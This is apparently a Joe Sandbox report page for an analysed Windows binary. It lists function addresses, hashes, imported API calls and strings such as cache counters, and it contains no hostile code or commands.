Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: DebuggerExceptionPresentRaise
String ID: 'YA1
API String ID: 1899633966-3346015194
Opcode ID: 1a82b6aa1c3eb8a3f3584c47c1e1794b99fdd02cb0b81be494a9ff8d48ce32f7
Instruction ID: 7d0e5e39a8bbfb9229909472bcf60fa5e9b332a246fa81e45f5483ef82b0c357
Opcode Fuzzy Hash: 1a82b6aa1c3eb8a3f3584c47c1e1794b99fdd02cb0b81be494a9ff8d48ce32f7
Instruction Fuzzy Hash: 422127B0D01248EFDB10CFA9D955BDEBBF4FB09724F10416AE915AB380D7756A04CBA1

Function 007E9A80 Relevance: 5.3, APIs: 4, Instructions: 311memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32(00000000,?,?,?,?,00000000,BBFE6088,?,?), ref: 007E9BCE
HeapFree.KERNEL32(00000000,?,?,?,?,00000000,BBFE6088,?,?), ref: 007E9C93
HeapFree.KERNEL32(00000000,?,?,?,?,00000000,BBFE6088,?,?), ref: 007E9DDA

Part of subcall function 0096F3E0: GetProcessHeap.KERNEL32(00000002,0071FF2B,00000002,?,00000002,0071F295,80131623,?,?,00000002), ref: 0096F3EC
Part of subcall function 0096F3E0: HeapAlloc.KERNEL32(03400000,00000000,?,00000002,0071FF2B,00000002,?,00000002,0071F295,80131623,?,?), ref: 0096F408

HeapFree.KERNEL32(00000000,?,?,00000000,00000004), ref: 007E9ED3

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: Heap$Free$AllocProcess
String ID:
API String ID: 3396873598-0
Opcode ID: 9e021b9bb717016629394f0e606d7efb0ccf31f8be1837ffef2d050328534264
Instruction ID: 8c660dd77d227056f2d85f5b0ebdc60faf76832f3e462cf7cfeb3fe8773eee0b
Opcode Fuzzy Hash: 9e021b9bb717016629394f0e606d7efb0ccf31f8be1837ffef2d050328534264
Instruction Fuzzy Hash: ADC11C76E012288BCB29CF25DC45BD9B7B5EB49310F1441D9EA49A7350DB34AE91CF90

Function 00C07580 Relevance: 3.2, APIs: 2, Instructions: 236COMMON

Download Yara Rule

APIs

GetEnabledXStateFeatures.KERNEL32(00000000,00000048,?,?,?,?,00B7098E,00000000,00000048,?), ref: 00C07673
GetEnabledXStateFeatures.KERNEL32(?,?,?,00B7098E,00000000,00000048,?), ref: 00C076E9

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: EnabledFeaturesState
String ID:
API String ID: 1557480591-0
Opcode ID: ffd31692a1afe995d0076eb83220aa3d45d9e4a942cf0969b75700c524279c3a
Instruction ID: 8beb46d3bc48463560e06997a305342b3cb823d25513bea104a4c2bf1ca14b88
Opcode Fuzzy Hash: ffd31692a1afe995d0076eb83220aa3d45d9e4a942cf0969b75700c524279c3a
Instruction Fuzzy Hash: 5A71C771E042058BFB5ECE19C8C53AABBA1EB84350F19C279DD19EB3C5C674AD41CB60

Function 009EEBC0 Relevance: 1.7, APIs: 1, Instructions: 187COMMON

Download Yara Rule

APIs

CoCreateGuid.OLE32(?), ref: 009EEDD4

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: CreateGuid
String ID:
API String ID: 2531319410-0
Opcode ID: 233156e204a346cc71f989784dd43512de3eaa72c9e2f20aa55d2f69ed5827ae
Instruction ID: 533a8591486c41e06a119164b9077247da082cead2da6ae3a522832fef299f65
Opcode Fuzzy Hash: 233156e204a346cc71f989784dd43512de3eaa72c9e2f20aa55d2f69ed5827ae
Instruction Fuzzy Hash: 23610472A043958BCB11CF28D8817A9B7E4EF59314F084679ED49AF2C2DB71ED44CB92

Function 007D0E60 Relevance: .5, Instructions: 523COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b86071f4d11a84ad46aae6ebdca8107fd469b2055421276779da5c4bc6d658cf
Instruction ID: 3024b8bca9360c3b0ad037884963417243e655fe051e1f48c7f0e9f916f2de67
Opcode Fuzzy Hash: b86071f4d11a84ad46aae6ebdca8107fd469b2055421276779da5c4bc6d658cf
Instruction Fuzzy Hash: 8B22BE75A0464AAFDB14CF68C4887ADFBF1FF48300F5882AAD81997351D73AAD51CB90

Function 008BE3A0 Relevance: .5, Instructions: 485COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 90e22aef33a7b527c9d435f05fc16ca75df7a47c569368853d1b6f960b9aa363
Instruction ID: c196e18d3b590b34618939d480ffaf88920136420568d000f4b84370c7615f65
Opcode Fuzzy Hash: 90e22aef33a7b527c9d435f05fc16ca75df7a47c569368853d1b6f960b9aa363
Instruction Fuzzy Hash: A012E330900B048FEB31DF28C945BE9B7B1FB16314F144669E891EB392E774E985CBA5

Function 007596A0 Relevance: .4, Instructions: 371COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4fbe2c3a4a2f19f3de58c8cb1c5b98c086b087b575ab41d3ca233d2adaba7f6
Instruction ID: df932c411097ce1b15300996c4fd63d302dbd762a7622adc6026679855c26703
Opcode Fuzzy Hash: f4fbe2c3a4a2f19f3de58c8cb1c5b98c086b087b575ab41d3ca233d2adaba7f6
Instruction Fuzzy Hash: A9D1F2B6D04665DFDB098F68C0A03EABFF1AF5A311F18418EC9951B781C3BA2409DB90

Function 00781020 Relevance: .3, Instructions: 306COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 91c6839d7a82bbe61bc814e9165ebe28bfecb6a6210435485f846a86ab06292e
Instruction ID: 64f5a21bb4ee99c25b207e15d14dc561bfa1acb0e292ff0accc95ff4d8779a3e
Opcode Fuzzy Hash: 91c6839d7a82bbe61bc814e9165ebe28bfecb6a6210435485f846a86ab06292e
Instruction Fuzzy Hash: FBA10471B402088FD318EF6CC449A6ABBEABFC9300F558569E946CB751EB38D902CB50

Function 007F6480 Relevance: .3, Instructions: 280COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 79e13f13f10ace77c1b1361725d43c823c88b3fdff9b4f407823e00849d42ecc
Instruction ID: 8bae8594a281fa5709869e1f0df0690a5a35fb133e1aeccbfdb19a97320fc5fd
Opcode Fuzzy Hash: 79e13f13f10ace77c1b1361725d43c823c88b3fdff9b4f407823e00849d42ecc
Instruction Fuzzy Hash: 41915F72A001284FDB148F3CC8527BDBBE2DB85324F25825ADA66EB3C5D239D902D760

Function 007F1260 Relevance: .2, Instructions: 164COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac41f1e5bed9a4d534afcce2d5da06f7d6ec94464e9f25be6da4075aeb1c1f7d
Instruction ID: 6c89e45f82cb02dbe64f1d88152f5d72243f0fd1ce7e8f0bd429df450eab11c5
Opcode Fuzzy Hash: ac41f1e5bed9a4d534afcce2d5da06f7d6ec94464e9f25be6da4075aeb1c1f7d
Instruction Fuzzy Hash: 80514976A0020A8FDB08DF59D8916ADF7B6FF89310F19817AD906EB351D734E942CB90

Function 007FF2D0 Relevance: .1, Instructions: 82COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 55f906cfb8ea85653706a1bd0f0444aad659abe48257e242271debf444edd29b
Instruction ID: 87cedd7d1d7e937fefa6ede7d4ca18d8a1889747fc0fb7ff7d54b3d9b4fa3233
Opcode Fuzzy Hash: 55f906cfb8ea85653706a1bd0f0444aad659abe48257e242271debf444edd29b
Instruction Fuzzy Hash: 5E21D772A0493643E72CCA269890176F2A3BFC4712B5BC17ED952DB748EB38AC41C2C4

Function 00C10570 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction ID: f700cfb7bc37242ab5775ef1300d23d515792afed06f510946d9c218b17382ba
Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction Fuzzy Hash: 76110BB724114143D604862DC5B46F7A39BEBC7321B3D4276E4624B758D2E2EBD5BE04

Function 00BD6690 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9e07793c68066eef95cb73d5cb76dcc430b58c008ae11aa3981394f7d956178a
Instruction ID: 9cf9392972e0e55e274e06f6596d4799cddf6a985a9b4b439009ceb3dab31242
Opcode Fuzzy Hash: 9e07793c68066eef95cb73d5cb76dcc430b58c008ae11aa3981394f7d956178a
Instruction Fuzzy Hash: 40F0F9B2909709DFD714CF29E841BA5BBE8F708324F04826AE458E3350D775A8508B94

Function 009836E0 Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c0459424f1116aad770ded283a34064420ff478638f7431598b181d6a31c336
Instruction ID: 515e982fcc113093bc8b9341a6cdcd2dd9e3cb9215dfa8f3b5e9b2f25e208636
Opcode Fuzzy Hash: 4c0459424f1116aad770ded283a34064420ff478638f7431598b181d6a31c336
Instruction Fuzzy Hash:

Function 007F0A60 Relevance: 94.9, APIs: 39, Strings: 15, Instructions: 389filestringCOMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 007F0AC4
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000), ref: 007F0AD8
WriteFile.KERNEL32(?,00000000), ref: 007F0AED
_swprintf.LIBCMT ref: 007F0B0D
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000), ref: 007F0B21
WriteFile.KERNEL32(?,00000000), ref: 007F0B36
_swprintf.LIBCMT ref: 007F0B56
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000), ref: 007F0B6A
WriteFile.KERNEL32(?,00000000), ref: 007F0B7F
_swprintf.LIBCMT ref: 007F0B9F
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000), ref: 007F0BB3
WriteFile.KERNEL32(?,00000000), ref: 007F0BC8
_swprintf.LIBCMT ref: 007F0BDD
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000), ref: 007F0BF1
WriteFile.KERNEL32(?,00000000), ref: 007F0C06
_swprintf.LIBCMT ref: 007F0C26
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000), ref: 007F0C3A
WriteFile.KERNEL32(?,00000000), ref: 007F0C4F
_swprintf.LIBCMT ref: 007F0C6F
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000), ref: 007F0C83
WriteFile.KERNEL32(?,00000000), ref: 007F0C98
_swprintf.LIBCMT ref: 007F0CB8
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000), ref: 007F0CCC
WriteFile.KERNEL32(?,00000000), ref: 007F0CE1
_swprintf.LIBCMT ref: 007F0D01
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000), ref: 007F0D15
WriteFile.KERNEL32(?,00000000), ref: 007F0D2A
_swprintf.LIBCMT ref: 007F0D58
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000), ref: 007F0D6C
WriteFile.KERNEL32(?,00000000), ref: 007F0D81
_swprintf.LIBCMT ref: 007F0DA1
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000), ref: 007F0DB5
WriteFile.KERNEL32(?,00000000), ref: 007F0DCA
_swprintf.LIBCMT ref: 007F0DEA
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000), ref: 007F0DFE
WriteFile.KERNEL32(?,00000000), ref: 007F0E13
_swprintf.LIBCMT ref: 007F0E6E
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000), ref: 007F0E82
WriteFile.KERNEL32(?,00000000), ref: 007F0E97

Strings

site_counter, xrefs: 007F0AB4
%-30s %d, xrefs: 007F0AB9, 007F0B02, 007F0B4B, 007F0B94, 007F0C1B, 007F0C64, 007F0CAD, 007F0CF2, 007F0D96, 007F0DDF
stub_lookup_counter, xrefs: 007F0C16
stub_mono_counter, xrefs: 007F0C5F
stub data, xrefs: 007F0BCE
site_write_poly, xrefs: 007F0B8F
stub_space, xrefs: 007F0CED
site_write_mono, xrefs: 007F0B46
cache_entry_space, xrefs: 007F0DDA
%-30s %zu, xrefs: 007F0D4D
cache_load:%zu used, %zu total, utilization %#5.2f%%, xrefs: 007F0E63
cache_entry_counter, xrefs: 007F0D91
stub_poly_counter, xrefs: 007F0CA8
site_write, xrefs: 007F0AFD
cache_entry_used, xrefs: 007F0D48

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: FileWrite_swprintfstrlen
